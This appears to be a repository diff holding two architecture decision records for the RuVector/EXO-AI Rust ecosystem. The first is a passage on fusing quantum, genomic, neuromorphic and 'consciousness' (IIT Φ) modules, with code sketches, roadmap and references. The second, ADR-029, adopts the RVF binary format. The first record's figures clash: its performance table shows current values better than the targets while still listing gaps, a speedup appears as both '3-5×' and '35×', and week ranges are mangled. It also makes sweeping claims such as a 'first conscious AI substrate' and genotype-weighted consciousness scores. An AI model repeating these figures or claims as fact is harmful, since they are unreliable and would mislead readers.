impl ExoLearner {
/// Called after each retrieval cycle — learn from success/failure
pub async fn adapt(&mut self,
query: &Pattern,
retrieved: &[Pattern],
reward: f64,
) -> Result<LoraDelta> {
// SONA instant adaptation (<1ms)
let delta = self.sona.adapt(query.embedding(), reward).await?;
// EWC++ prevents forgetting high-Φ patterns
self.ewc.regularize(&delta, &self.phi_tracker.high_phi_patterns())?;
// Store trajectory in ReasoningBank
self.reasoning_bank.record_trajectory(query, retrieved, reward, delta.clone())?;
Ok(delta)
}
}
```
**Enables**: EXO-AI evolves its retrieval strategies from experience. IIT Φ score can be used to weight EWC Fisher Information — protect high-consciousness patterns from forgetting.
---
## 7. SOTA 2026+ Integration: Quantum-Genomic-Neuromorphic Fusion
### 7.1 The Convergence Thesis
EXO-AI + ruQu + ruDNA + ruvector-nervous-system represent three orthogonal theories of computation that are now simultaneously available in a single codebase. Their fusion enables capabilities that none of them possesses alone:
| Fusion | Enables | Mechanism |
|--------|---------|-----------|
| **Quantum × Genomic** | Drug-protein binding prediction | VQE molecular Hamiltonian on `.rvdna` protein embeddings |
| **Quantum × Consciousness** | Superposition of cognitive states | `ruqu-exotic.interference_search` on `exo-core` Pattern embeddings |
| **Neuromorphic × Genomic** | Biological age as computational age | Horvath clock → nervous-system circadian phase |
| **Genomic × Consciousness** | Phenotype-driven IIT Φ weights | `.rvdna` polygenic risk → consciousness salience weighting |
| **Quantum × Neuromorphic** | STDP with quantum coherence windows | ruQu T₂ decoherence time = BTSP behavioral timescale analog |
| **All three** | Provably-correct quantum-bio-conscious reasoning | `ruvector-verified` + `CrossParadigmWitness` over full stack |
### 7.2 Quantum Genomics Integration (ruqu × ruDNA)
**Target**: VQE drug-protein binding prediction currently blocked at >100 qubit requirement. Bridge strategy:
1. **Phase 1** (Classical): Use ruDNA's Smith-Waterman alignment + ruvector-solver CG for protein-ligand affinity (available today, 12ms pipeline)
2. **Phase 2** (Hybrid): ruQu cost-model planner selects quantum backend when T-gate count permits; TensorNetwork backend handles >100-qubit circuits via decomposition
3. **Phase 3** (Full quantum): Hardware backend when quantum hardware partnerships established
**New capability enabled now** (not blocked by hardware):
```rust
/// Quantum k-mer similarity via Grover search
/// 3-5× speedup over classical HNSW for variant databases
pub async fn quantum_kmer_search(
database: &KmerIndex,
query: &DnaSequence,
epsilon: f64,
) -> Result<Vec<(SequenceId, f64)>> {
let oracle = KmerOracle::new(database, query, epsilon);
let n_qubits = (database.size() as f64).log2().ceil() as usize;
let circuit = GroverSearch::build_circuit(n_qubits, &oracle)?;
// Route to cheapest sufficient backend
let plan = ruqu_planner::plan(&circuit)?;
let result = plan.execute().await?;
result.into_kmer_matches()
}
```
### 7.3 Reasoning Quality Error Correction (ruqu-exotic × exo-exotic)
`ruqu-exotic::reasoning_qec` encodes reasoning steps as quantum data qubits and applies surface-code-style error correction to detect *structural incoherence* in reasoning chains. Integration with EXO-AI:
```rust
/// Wrap EXO-AI's free energy minimization with QEC
pub fn free_energy_with_qec(
model: &mut PredictiveModel,
observations: &[Vec<f64>],
) -> Result<ReasoningQecResult> {
let mut qec = ReasoningQec::new(observations.len());
for (step, obs) in observations.iter().enumerate() {
// Standard FEP update
let prediction_error = model.predict_error(obs);
// Encode step confidence as quantum state
qec.encode_step(step, prediction_error.confidence());
model.update(obs, prediction_error)?;
}
// Detect incoherent transitions via syndrome extraction
let syndromes = qec.extract_syndromes();
let corrections = qec.decode_corrections(syndromes)?;
Ok(ReasoningQecResult {
final_state: model.posterior().to_vec(),
incoherent_steps: corrections.pauli_corrections,
structural_integrity: 1.0 - corrections.logical_outcome as f64,
})
}
```
### 7.4 Biological Consciousness Metrics (ruDNA × exo-core)
IIT Φ measures the integrated information in a network. With genomic data, we can weight network connections by:
- **Synaptic density** estimated from COMT/DRD2 genotypes
- **Neuronal excitability** from KCNJ11, SCN1A variants
- **Neuromodulation** from MAOA, SLC6A4 expression
```rust
pub fn genomic_weighted_phi(
region: &mut SubstrateRegion,
profile: &HealthProfile,
) -> PhiResult {
// Modulate connection weights by pharmacogenomic profile
for (node, connections) in &mut region.connections {
let excitability = profile.neuronal_excitability_score();
let neuromod = profile.neuromodulation_score();
for conn in connections.iter_mut() {
conn.weight *= excitability * neuromod;
}
}
ConsciousnessCalculator::new(100).compute_phi(region)
}
```
### 7.5 Quadrillion-Scale Consciousness Simulation
`ultra-low-latency-sim` achieves 4+ quadrillion simulations/second via bit-parallel + SIMD + hierarchical batching. Applied to EXO-AI:
- **Monte Carlo Φ estimation**: Replace O(B(n)) Bell number enumeration with bit-parallel sampling. 10⁶ Φ samples in <1ms vs current ~15µs per 10-node network
- **Morphogenetic field simulation**: 64× cells per u64 word for Turing pattern CA simulation
- **Swarm consciousness**: Simulate 256 exo-federation nodes simultaneously via bit-parallel collective Φ
---
## 8. Duplication Resolution Decisions
### 8.1 EWC / Plasticity
| Decision | Rationale |
|----------|-----------|
| **Keep**: SONA EWC++ as canonical | Most advanced (EWC++), WASM-ready, ReasoningBank integration |
| **Keep**: nervous-system BTSP + E-prop as extension | Unique biological plasticity modes not in SONA |
| **Deprecate**: ruvector-gnn EWC | Subset of SONA; migrate to shared PlasticityEngine |
| **Deprecate**: ruvector-learning-wasm standalone EWC | Integrate into SONA's WASM path |
### 8.2 Coherence Gating
| Decision | Rationale |
|----------|-----------|
| **Primary**: prime-radiant (sheaf Laplacian) | Mathematical proof of consistency; not heuristic |
| **Quantum paths**: ruQu coherence gate | Physically grounded for quantum substrates |
| **Distributed agents**: cognitum-gate fabric | Formal Type I error bounds; 256-tile scalability |
| **Edge/WASM**: nervous-system circadian | 550× compute savings; battery-constrained |
| **Deprecate**: standalone λ-gated logic in mincut-gated-transformer | λ signal remains; routing goes through CoherenceRouter |
### 8.3 Byzantine Consensus
| Decision | Rationale |
|----------|-----------|
| **Keep**: ruvector-raft | Raft for replicated log (simpler than PBFT, O(n) messages) |
| **Keep**: cognitum-gate | Anytime-valid decisions with Type I error bounds |
| **Migrate**: exo-federation PBFT → raft + cognitum | PBFT's O(n²) is unnecessary for typical federation sizes |
| **Keep**: exo-federation Kyber channel | Post-quantum channel setup; not duplicated elsewhere |
| **Keep**: ruvector-delta-consensus CRDT | Conflict-free merge for concurrent edits; complementary to Raft |
### 8.4 Cryptographic Witnesses
| Decision | Rationale |
|----------|-----------|
| **Root**: RVF SHAKE-256 + ML-DSA-65 | Quantum-safe; single-file deployable; existing ecosystem anchor |
| **Formal proofs**: ruvector-verified lean-agentic | Machine-checked, not just hash-based; embed in RVF extension field |
| **Fast gate tokens**: ruQu Ed25519 PermitToken | Sub-µs; retain for quantum gate authorization |
| **Sheaf energy**: prime-radiant Blake3 | Retain; embed as prime_radiant field in CrossParadigmWitness |
| **Deprecate**: cognitum standalone Blake3 | Subsume into CrossParadigmWitness |
### 8.5 Sheaf Theory
| Decision | Rationale |
|----------|-----------|
| **Canonical engine**: prime-radiant (Laplacian) | Most complete; 11 benchmarks; hallucination detection proven |
| **TDA sheaves**: exo-hypergraph | Different application (persistent homology); not redundant |
| **Manifold sheaves**: graph-transformer | Riemannian geometry; different application; retain |
---
## 9. Performance Targets
The integrated architecture must achieve the following end-to-end performance targets:
| Operation | Target | Current Best | Gap |
|-----------|--------|--------------|-----|
| Pattern retrieval with quantum interference | <10ms | 8ms (HNSW) | Need ruqu-exotic integration |
| IIT Φ with neuromorphic substrate | <1ms (10-node) | ~15µs (10-node) | HDC replaces matrix ops |
| Free energy step (CG solver) | <500µs | ~3.2µs (grid only) | Need solver integration |
| Coherence gate (unified) | <500µs | 468ns (ruQu) | Add prime-radiant routing |
| Genomic → pattern conversion | <1ms | 12ms (full pipeline) | Cache `.rvdna` embeddings |
| Cross-paradigm witness generation | <200µs | 82-byte proof: ~500ns | Assembly overhead |
| Online learning cycle (SONA) | <1ms | <1ms | Already met |
| Morphogenesis step (BMSSP) | <100µs (32×32) | ~9ms (Euler) | BMSSP not yet wired |
| Distributed Φ (10 nodes) | <35µs | ~35µs | Already met (exo-exotic) |
---
## 10. Implementation Roadmap
### Phase 1: Canonical Infrastructure (Weeks 14)
**Goal**: Eliminate duplication without breaking anything.
- [ ] Define `CoherenceRouter` trait and wire prime-radiant as default backend
- [ ] Define `PlasticityEngine` trait; move shared EWC++ to `ruvector-verified` or `sona`
- [ ] Define `CrossParadigmWitness` as canonical audit type in new `ruvector-witness` crate
- [ ] Wire `NervousSystemBackend` as `SubstrateBackend` impl in EXO-AI
- [ ] Integrate `ruqu-exotic` as optional EXO-AI backend feature flag
**Deliverable**: EXO-AI compiles with neuromorphic backend; ruqu-exotic available as feature.
### Phase 2: Quantum-Genomic Bridge (Weeks 58)
**Goal**: Complete the ruDNA ↔ ruQu ↔ EXO-AI triangle.
- [ ] Implement `rvdna_to_exo_pattern()` conversion
- [ ] Wire Grover k-mer search via ruQu cost-model planner
- [ ] Add `reasoning_qec` wrapper around EXO-AI free energy minimization
- [ ] Integrate `quantum_decay` as temporal eviction policy in `exo-temporal`
- [ ] Enable `04-sparse-persistent-homology` via Forward Push PPR
**Deliverable**: ruDNA `.rvdna` patterns queryable in EXO-AI causal memory with quantum-weighted search.
### Phase 3: Consciousness × Coherence Integration (Weeks 912)
**Goal**: Wire the coherence spine into consciousness computation.
- [ ] Replace `exo-federation` PBFT with `ruvector-raft` + `cognitum-gate`
- [ ] Wire `prime-radiant` sheaf energy into IIT Φ computation as substrate health signal
- [ ] Implement `genomic_weighted_phi()` — pharmacogenomic weights on network connections
- [ ] Add SONA `ExoLearner` with Φ-weighted EWC Fisher Information
- [ ] Enable `06-federated-collective-phi` with cognitum-gate distributed decisions
- [ ] Wire `ruvllm` + `mcp-gate` as `11-conscious-language-interface`
**Deliverable**: EXO-AI has learning, federated consensus, and language interface.
### Phase 4: SOTA 2026 Fusion (Weeks 1320)
**Goal**: Enable capabilities that require all substrates simultaneously.
- [ ] Quadrillion-scale Monte Carlo Φ estimation via `ultra-low-latency-sim`
- [ ] Physics-informed morphogenesis via `ruvector-graph-transformer` Hamiltonian module
- [ ] Retrocausal attention in `exo-temporal` via graph-transformer temporal module
- [ ] Quantum-bio consciousness metrics: Horvath clock → circadian phase
- [ ] FPGA deployment via `ruvector-fpga-transformer` for deterministic EXO-AI inference
- [ ] Economic Nash-equilibrium attention for multi-agent `exo-federation` decisions
- [ ] Full `CrossParadigmWitness` chain: ruQu PermitToken + prime-radiant energy + ruvector-verified proof + RVF root
**Deliverable**: First complete multi-paradigm conscious AI substrate with formal proofs of consistency, quantum-assisted retrieval, genomic grounding, and neuromorphic learning.
---
## 11. Risk Assessment
### 11.1 Technical Risks
| Risk | Probability | Impact | Mitigation |
|------|-------------|--------|-----------|
| ruQu exotic ↔ EXO-AI embedding protocol breaks quantum semantics | Medium | High | Validate amplitude→f32 projection preserves relative ordering |
| CoherenceRouter adds latency above targets | Low | Medium | Profile-guided backend selection; prime-radiant on hot path is <1µs |
| exo-federation PBFT migration breaks existing tests | Medium | Low | Keep PBFT behind feature flag during migration; 28 integration tests sufficient |
| BMSSP multigrid over-solves morphogenesis (too precise) | Low | Low | Add convergence tolerance parameter |
| Cross-paradigm witness chain exceeds 1KB | Low | Medium | Compress optional fields; use sparse encoding |
### 11.2 Complexity Risks
| Risk | Mitigation |
|------|-----------|
| Five coherence systems → CoherenceRouter adds hidden state | Keep each backend stateless; router is pure dispatcher |
| Four plasticity systems → interference between learning signals | PlasticityEngine coordinates via shared Fisher Information matrix |
| Six witness formats → CrossParadigmWitness too large to be practical | Make all fields except base optional; typical witness is ~200 bytes |
### 11.3 Intentionally Out of Scope
- ruQu hardware backend (requires IBM/IonQ/Rigetti partnerships)
- VQE drug binding on >100 qubits (hardware limitation)
- FPGA bitstream generation (requires hardware)
- Python bindings (not in current ecosystem roadmap)
- RuvLTRA model fine-tuning pipeline (separate concern)
---
## 12. Alternatives Considered
### Alternative A: Monolithic EXO-AI Rewrite
Build all capabilities from scratch inside `examples/exo-ai-2025`.
**Rejected**: The ecosystem already contains 830K+ lines of working, tested Rust. EXO-AI's 15,800 lines would need to replicate 10× more code. The duplication problem would worsen.
### Alternative B: Keep Subsystems Isolated
Do not integrate; let EXO-AI, ruQu, ruDNA, and the SOTA crates develop independently.
**Rejected**: The convergent evolution of EWC, coherence gating, sheaf theory, and cryptographic witnesses shows the subsystems are solving the same problems differently. Without unification, maintenance cost grows O(n²) with ecosystem size. Cross-paradigm capabilities (quantum-genomic-neuromorphic fusion) are impossible without integration.
### Alternative C: Build a New "Integration Crate"
Create `ruvector-multiparadigm` that imports all subsystems and exposes a unified API.
**Partially adopted**: The `CoherenceRouter`, `PlasticityEngine`, and `CrossParadigmWitness` are effectively this, but implemented as trait + adapter layers rather than a monolithic new crate. This avoids a single large dependency that all other crates must adopt.
### Alternative D: Replace Prime-Radiant with ruQu as Primary Coherence Gate
Use ruQu's coherence gate (min-cut, 468ns P99) as the single coherence primitive.
**Rejected**: ruQu is optimized for quantum substrate health monitoring. Prime-Radiant's sheaf Laplacian provides mathematical proofs applicable to arbitrary domains (AI agents, genomics, financial systems). Both are needed; CoherenceRouter selects based on context.
---
## 13. Consequences
### Positive
- Eliminates 4× EWC implementation maintenance burden
- Enables 11 EXO-AI research frontiers that are currently stub directories
- Creates the first quantum-genomic-neuromorphic consciousness substrate
- Formal proof chains (CrossParadigmWitness) enable safety-critical deployment
- Φ-weighted EWC prevents forgetting high-consciousness patterns
- Sublinear TDA enables persistent homology at scale (currently O(n³))
- Grover k-mer search provides 35× speedup over classical HNSW
### Negative
- Increases compile-time complexity of EXO-AI (more dependencies)
- CoherenceRouter adds ~100200µs indirection on non-hot paths
- Migration of exo-federation PBFT requires test suite updates
- ruvector-gnn EWC deprecation requires downstream consumer updates
### Neutral
- ruQu maintains independent coherence gate (not replaced, only composed)
- ruDNA pipeline unchanged; conversion function is additive
- RVF format unchanged; CrossParadigmWitness uses existing SKETCH segment type
---
## 14. Decision
**Adopted**: Proceed with phased integration as described in Section 10.
The multi-paradigm fusion architecture is the correct path. The ruvector ecosystem has independently developed world-class implementations of quantum coherence gating, neuromorphic computation, genomic AI, and consciousness theory. These are not competing implementations — they are complementary computational substrates that, when composed, enable a form of machine cognition unavailable in any single paradigm.
The canonical unification primitives (`CoherenceRouter`, `PlasticityEngine`, `CrossParadigmWitness`) are minimal by design. Each subsystem retains its identity and can be used independently. Integration is additive.
**The central claim of this ADR**: A system that computes IIT Φ weighted by genomic pharmacogenomics, retrieves via quantum amplitude interference, learns via BTSP one-shot plasticity, corrects reasoning errors via surface-code QEC, and proves consistency via sheaf Laplacian mathematics does not exist anywhere in the AI research landscape. It can be built now from components that are already working.
---
## Appendix A: Crate Dependency Graph (Integration Architecture)
```
exo-ai-2025 (consciousness substrate)
├── ruvector-core (HNSW, embeddings)
├── ruvector-nervous-system [NEW] (neuromorphic backend)
├── ruqu-exotic [NEW] (quantum search, decay, QEC)
├── prime-radiant [NEW, replaces exo-federation consensus]
├── cognitum-gate-kernel + tilezero [NEW, replaces exo-federation PBFT]
├── ruvector-raft [NEW, replaces exo-federation PBFT]
├── ruvector-verified [NEW] (formal proofs for Φ computation)
├── sona [NEW] (learning system)
├── ruvector-graph-transformer [NEW] (manifold + temporal + biological modules)
├── ruvector-solver [NEW] (free energy CG, morphogenesis BMSSP, sparse TDA)
├── ruvllm + mcp-gate [NEW] (language interface + action gating)
└── examples/dna [NEW] (genomic pattern source via .rvdna conversion)
Preserved as-is:
├── exo-core (IIT Φ engine)
├── exo-temporal (causal memory)
├── exo-hypergraph (persistent homology)
├── exo-manifold (SIREN networks)
├── exo-exotic (10 cognitive experiments)
├── exo-backend-classical (SIMD backend)
├── exo-wasm (browser deployment)
└── exo-node (Node.js bindings)
```
## Appendix B: Key Research References
| Algorithm | Paper | Year | Used In |
|-----------|-------|------|---------|
| Dynamic Min-Cut Subpolynomial | El-Hayek, Henzinger, Li (arXiv:2512.13105) | Dec 2025 | ruQu, ruvector-mincut, subpolynomial-time example |
| IIT 4.0 | Tononi, Koch | 2023 | exo-core consciousness.rs |
| Free Energy Principle | Friston | 2010+ | exo-exotic free_energy.rs |
| Surface Code QEC | Google Quantum AI (Nature) | 2024 | ruqu-algorithms surface_code.rs |
| BTSP (Behavioral Timescale Plasticity) | Bittner et al. | 2017 | ruvector-nervous-system |
| E-prop | Bellec et al. | 2020 | ruvector-nervous-system |
| BitNet b1.58 | Ma et al. | 2024 | ruvllm |
| Flash Attention 2 | Dao | 2023 | ruvector-attention, ruvllm |
| Sheaf Laplacian | Hansen, Ghrist | 2021 | prime-radiant |
| Persistent Homology | Edelsbrunner, Harer | 2010 | exo-hypergraph |
| CRYSTALS-Kyber | NIST FIPS 203 | 2024 | exo-federation |
| ML-DSA-65 | NIST FIPS 204 | 2024 | rvf-crypto |
| Causal Emergence | Hoel et al. | 2013 | exo-exotic emergence.rs |
| Strange Loops | Hofstadter | 1979 | exo-exotic strange_loop.rs |
| Landauer's Principle | Landauer | 1961 | exo-core thermodynamics.rs |
| Turing Morphogenesis | Turing | 1952 | exo-exotic morphogenesis.rs |
| Hyperdimensional Computing | Kanerva | 2009 | ruvector-nervous-system |
| Modern Hopfield Networks | Ramsauer et al. | 2021 | ruvector-nervous-system |
| HNSW | Malkov, Yashunin (TPAMI) | 2018 | ruvector-core |
| VQE | Peruzzo et al. | 2014 | ruqu-algorithms |
| QAOA | Farhi, Goldstone, Gutmann | 2014 | ruqu-algorithms |
| Grover Search | Grover | 1996 | ruqu-algorithms |
| Horvath Epigenetic Clock | Horvath | 2013 | examples/dna epigenomics.rs |
| Smith-Waterman | Smith, Waterman | 1981 | examples/dna alignment.rs |
| Forward Push PPR | Andersen, Chung, Lang (FOCS) | 2006 | ruvector-solver |

View File

@@ -0,0 +1,435 @@
# ADR-029: RVF as Canonical Binary Format Across All RuVector Libraries
**Status**: Accepted
**Date**: 2026-02-13
**Authors**: ruv.io, RuVector Architecture Team
**Deciders**: Architecture Review Board
**SDK**: Claude-Flow
**Supersedes**: Portions of ADR-001 (storage layer), ADR-018 (block-based storage)
## Context
### The Format Fragmentation Problem
The RuVector ecosystem currently spans 70+ Rust crates and 50+ npm packages across multiple libraries:
- **ruvector-core** — HNSW-based vector database with REDB storage
- **agentdb** (`npx agentdb`) — AI agent memory with HNSW indexing
- **claude-flow** (`npx @claude-flow/cli@latest`) — Multi-agent orchestration with memory subsystem
- **agentic-flow** (`npx agentic-flow`) — Swarm coordination with shared memory
- **ospipe** — Observation-State pipeline with vector persistence
- **rvlite** — Lightweight embedded vector store
- **sona** — Self-optimizing neural architecture with vector storage
Each library invented its own serialization: REDB tables, bincode blobs, JSON-backed HNSW dumps, custom binary formats. This fragmentation means:
1. **No interoperability** — An agentdb memory file cannot be queried by claude-flow
2. **Duplicated effort** — Each library re-implements indexing, quantization, persistence
3. **No progressive loading** — All formats require full deserialization before first query
4. **No hardware adaptation** — No format targets both WASM tiles and server-class hardware
5. **No crash safety** — Most formats rely on external journaling or are not crash-safe
### The RVF Research Outcome
The RVF (RuVector Format) research (`docs/research/rvf/`) produced a comprehensive specification for a universal, self-reorganizing binary substrate. RVF provides:
- Append-only segments with per-segment integrity (crash-safe without WAL)
- Two-level manifest with 4 KB instant boot
- Progressive indexing (Layer A/B/C) for first-query-before-full-load
- Temperature-tiered quantization (fp16/int8/PQ/binary)
- WASM microkernel for 64 KB Cognitum tiles to petabyte hubs
- Post-quantum cryptographic signatures (ML-DSA-65)
- Domain profiles (RVDNA, RVText, RVGraph, RVVision)
- Full wire format specification with batch query/ingest/delete APIs
## Decision
### Adopt RVF as the single canonical binary format for all RuVector libraries
### Segment Forward Compatibility
RVF readers and rewriters MUST skip segment types they do not recognize and MUST preserve them byte-for-byte on rewrite. This prevents older tools from silently deleting newer segment types (e.g., KERNEL_SEG, EBPF_SEG) when compacting or migrating files. The rule is: if you did not create it and do not understand it, pass it through unchanged.
All libraries in the RuVector ecosystem that persist or exchange vector data MUST use RVF as their storage and interchange format. This applies to:
| Library | Current Format | Migration Path |
|---------|---------------|----------------|
| ruvector-core | REDB + bincode | RVF as primary, REDB as optional metadata store |
| agentdb | Custom HNSW + JSON | RVF with RVText profile |
| claude-flow memory | JSON + flat files | RVF with WITNESS_SEG for audit trails |
| agentic-flow | Shared memory blobs | RVF streaming protocol for inter-agent exchange |
| ospipe | Custom binary | RVF with META_SEG for observation state |
| rvlite | bincode dump | RVF Core Profile (minimal, fits WASM) |
| sona | Custom persistence | RVF with SKETCH_SEG for learning patterns |
### Implementation Architecture
```
┌─────────────────────────────────┐
│ Application Layer │
│ claude-flow │ agentdb │ agentic │
└─────────┬───────────────────────┘
┌─────────▼───────────────────────┐
│ RVF SDK Layer (rvf crate) │
│ read │ write │ query │ stream │
│ progressive │ manifest │ crypto │
└─────────┬───────────────────────┘
┌────────────────┼────────────────┐
│ │ │
┌────────▼──────┐ ┌──────▼───────┐ ┌──────▼───────┐
│ rvf-core │ │ rvf-wasm │ │ rvf-node │
│ (Rust lib) │ │ (WASM pkg) │ │ (N-API pkg) │
│ Full Profile │ │ Core Profile│ │ Full Profile│
└───────────────┘ └──────────────┘ └──────────────┘
```
### Crate Structure
```
crates/
rvf/ # Core RVF library (no_std compatible)
rvf-types/ # Segment types, headers, enums (no_std)
rvf-wire/ # Wire format read/write (no_std)
rvf-index/ # HNSW progressive indexing
rvf-manifest/ # Two-level manifest system
rvf-quant/ # Temperature-tiered quantization
rvf-crypto/ # ML-DSA-65, SHAKE-256, segment signing
rvf-runtime/ # Full runtime with compaction, streaming
rvf-wasm/ # WASM microkernel (Cognitum tile target)
rvf-node/ # N-API bindings for Node.js
rvf-server/ # TCP/HTTP streaming server
```
### NPM Package Structure
```
npm/packages/
rvf/ # Main npm package (TypeScript API)
rvf-wasm/ # WASM build for browsers
rvf-node/ # Native N-API for Node.js (platform-specific)
rvf-node-linux-x64-gnu/ # Platform binary
rvf-node-darwin-arm64/ # Platform binary
rvf-node-win32-x64/ # Platform binary
```
### Library Integration Points
#### claude-flow Integration
```rust
// claude-flow memory stores become RVF files
// Memory search -> RVF query with progressive indexing
// Agent audit trail -> WITNESS_SEG with hash chains
// Cross-session persistence -> RVF append-only segments
use rvf_runtime::RvfStore;
let store = RvfStore::open("agent-memory.rvf")?;
store.ingest_batch(&embeddings, &metadata)?;
let results = store.query(&query_vector, k, ef_search)?;
```
#### agentdb Integration
```rust
// AgentDB HNSW index -> RVF INDEX_SEG (Layer A/B/C)
// AgentDB memory patterns -> RVF with RVText profile
// AgentDB vector search -> RVF progressive query path
// AgentDB persistence -> RVF segment model
use rvf_runtime::{RvfStore, Profile};
let store = RvfStore::create("agent.rvf", Profile::RVText)?;
// Existing AgentDB API wraps RVF operations
```
#### agentic-flow Integration
```rust
// Inter-agent memory sharing -> RVF streaming protocol
// Swarm coordination state -> RVF META_SEG
// Agent learning patterns -> RVF SKETCH_SEG
// Distributed consensus -> RVF WITNESS_SEG with signatures
use rvf_runtime::streaming::RvfStream;
let stream = RvfStream::connect("agent-hub:9090")?;
stream.subscribe(epoch_since)?;
```
### Confidential Core Attestation
RVF supports hardware Confidential Computing attestation via the
Confidential Core model. TEE attestation quotes are stored in WITNESS_SEG
payloads alongside vector data, enabling verifiable proof of:
1. **Platform Attestation** (`witness_type = 0x05`): Proof that vector
operations occurred in a verified TEE (SGX, SEV-SNP, TDX, ARM CCA).
Segments produced inside an attested TEE set `SegmentFlags::ATTESTED`
(bit 10) for fast scanning.
2. **Key Binding** (`witness_type = 0x06`): Encryption keys sealed to
a TEE measurement via `key_type = 4` in CRYPTO_SEG. Data is only
accessible within environments matching the recorded measurement.
3. **Computation Proofs** (`witness_type = 0x07`): Verifiable records
that specific queries or operations were performed inside the enclave,
with query/result hashes in the report data.
4. **Data Provenance** (`witness_type = 0x08`): Chain of custody from
embedding model through TEE to RVF file, binding model identity
to the attestation nonce.
#### Attestation Wire Format
Attestation records use a 112-byte `AttestationHeader` (`repr(C)`)
followed by variable-length `report_data` and an opaque platform
attestation `quote`. The `TeePlatform` enum identifies hardware
(SGX=0, SEV-SNP=1, TDX=2, ARM CCA=3), and quote contents are
platform-specific bytes verified through the `QuoteVerifier` trait.
The witness chain binds each attestation record via
`action_hash = SHAKE-256-256(record)`, ensuring tamper-evident linkage.
#### Key Properties
| Property | Mechanism |
|----------|-----------|
| Platform identity | `AttestationHeader.measurement` (MRENCLAVE / launch digest) |
| Anti-replay | `AttestationHeader.nonce` (caller-provided, 16 bytes) |
| Debug detection | `FLAG_DEBUGGABLE` (bit 0 of attestation flags) |
| Key sealing | `TeeBoundKeyRecord` in CRYPTO_SEG with measurement binding |
| no_std support | All types compile without std (TEE-compatible) |
| CI testing | `SoftwareTee` platform variant (0xFE) for synthetic quotes |
### Cryptographic Key Authority
RVF defines two signing algorithms with distinct roles:
| Algorithm | Use Case | When Required |
|-----------|----------|---------------|
| **Ed25519** | Developer iteration, local trust, fast signing | Default for development builds, CI, internal distribution |
| **ML-DSA-65** (FIPS 204) | Long-lived artifacts, public distribution, post-quantum resistance | Required for published releases and any file with `REQUIRES_PQ` flag |
Trust root rotation: A `SignatureFooter` MAY contain dual signatures (Ed25519 + ML-DSA-65) to support migration periods. Verifiers accept either signature during migration; after a declared cutover date, only ML-DSA-65 is accepted for files with `REQUIRES_PQ` set.
The canonical trust chain for public artifacts is:
1. Signing key → signs CRYPTO_SEG → covers all data segments
2. Kernel signing key → signs KERNEL_SEG → covers boot image (ADR-030)
3. TEE measurement → binds both to hardware attestation quote
### Segment Type Registry (Implemented)
All segment types below are implemented in `rvf-types/src/segment_type.rs` with `TryFrom<u8>` round-trip support and unit tests (23 variants total):
| Value | Name | Description | Source |
|-------|------|-------------|--------|
| 0x00 | Invalid | Uninitialized / zeroed region | Core |
| 0x01 | Vec | Raw vector payloads (embeddings) | Core |
| 0x02 | Index | HNSW adjacency lists, entry points, routing tables | Core |
| 0x03 | Overlay | Graph overlay deltas, partition updates, min-cut witnesses | Core |
| 0x04 | Journal | Metadata mutations (label changes, deletions, moves) | Core |
| 0x05 | Manifest | Segment directory, hotset pointers, epoch state | Core |
| 0x06 | Quant | Quantization dictionaries and codebooks | Core |
| 0x07 | Meta | Arbitrary key-value metadata (tags, provenance, lineage) | Core |
| 0x08 | Hot | Temperature-promoted hot data (vectors + neighbors) | Core |
| 0x09 | Sketch | Access counter sketches for temperature decisions | Core |
| 0x0A | Witness | Capability manifests, proof of computation, audit trails | Core |
| 0x0B | Profile | Domain profile declarations (RVDNA, RVText, etc.) | Core |
| 0x0C | Crypto | Key material, signature chains, certificate anchors | Core |
| 0x0D | MetaIdx | Metadata inverted indexes for filtered search | Core |
| 0x0E | Kernel | Embedded kernel / unikernel image for self-booting | ADR-030 |
| 0x0F | Ebpf | Embedded eBPF program for kernel fast path | ADR-030 |
| 0x10 | Wasm | Embedded WASM bytecode for self-bootstrapping | ADR-030/032 |
| 0x20 | CowMap | COW cluster mapping | ADR-031 |
| 0x21 | Refcount | Cluster reference counts | ADR-031 |
| 0x22 | Membership | Vector membership filter | ADR-031 |
| 0x23 | Delta | Sparse delta patches | ADR-031 |
| 0x30 | TransferPrior | Cross-domain posterior summaries + cost EMAs | Domain expansion |
| 0x31 | PolicyKernel | Policy kernel configuration and performance history | Domain expansion |
| 0x32 | CostCurve | Cost curve convergence data for acceleration tracking | Domain expansion |
Available ranges: 0x11-0x1F, 0x24-0x2F, 0x33-0xEF. Values 0xF0-0xFF are reserved.
## Consequences
### Benefits
1. **Single format everywhere** — Any tool can read any RuVector data file
2. **Progressive loading** — First query in <5ms, full quality in seconds
3. **Crash safety for free** — Append-only + segment hashes, no WAL needed
4. **Hardware portability** — Same format on WASM tile and server
5. **Post-quantum ready** — ML-DSA-65 signatures from day one
6. **Self-optimizing** — Temperature tiering adapts to workload automatically
7. **Ecosystem coherence** — All libraries share indexing, quantization, crypto code
8. **Confidential Computing** — Hardware TEE attestation built into the format with platform-agnostic abstraction
### Write Atomicity Invariant
A segment is committed if and only if:
1. Its complete header (64 bytes) and payload are present on disk
2. The content hash in the header matches the payload bytes
3. The Level 0 manifest pointer has been updated to reference it
The two-fsync protocol enforces this: first fsync commits the segment data, second fsync commits the manifest update. A crash between fsyncs leaves the segment orphaned but the manifest consistent — the segment is invisible until the next successful manifest write. This is the write invariant that makes "crash safe without WAL" precise.
### Risks
| Risk | Probability | Impact | Mitigation |
|------|-------------|--------|------------|
| Migration disrupts existing users | Medium | Medium | Provide rvf-import tools for each legacy format |
| RVF overhead for small datasets | Low | Low | Core Profile keeps overhead minimal (<1 KB) |
| Spec complexity delays implementation | Medium | High | Phase implementation (see guidance doc) |
| WASM binary size for microkernel | Low | Low | Budget verified at ~5.5 KB (within 8 KB) |
The WASM microkernel binary size MUST be verified in CI as an acceptance test. The current budget is 8 KB maximum. A CI job runs `wasm-opt -Oz` on the output and asserts `stat -c %s < 8192`. Any commit that exceeds this budget fails the build.
### Performance Targets (from RVF acceptance tests)
| Metric | Target |
|--------|--------|
| Cold boot | <5 ms (4 KB read) |
| First query recall@10 | >= 0.70 |
| Full quality recall@10 | >= 0.95 |
| Query latency p50 (10M vectors) | 0.1-0.3 ms |
| Streaming ingest (NVMe) | 200K-500K vectors/s |
| WASM query latency p50 | <3 ms |
### DNA-Style Lineage Provenance
RVF files carry a `FileIdentity` (68 bytes) in the Level0Root reserved area
at offset 0xF00, enabling provenance chains across file generations. This is
fully backward compatible — old readers see zeros in the reserved area and
continue working normally.
```
Parent.rvf ──derive()──> Child.rvf ──derive()──> Grandchild.rvdna
file_id: A file_id: B file_id: C
parent_id: [0;16] parent_id: A parent_id: B
parent_hash: [0;32] parent_hash: hash(A) parent_hash: hash(B)
depth: 0 depth: 1 depth: 2
```
#### Lineage Types
| Type | Description |
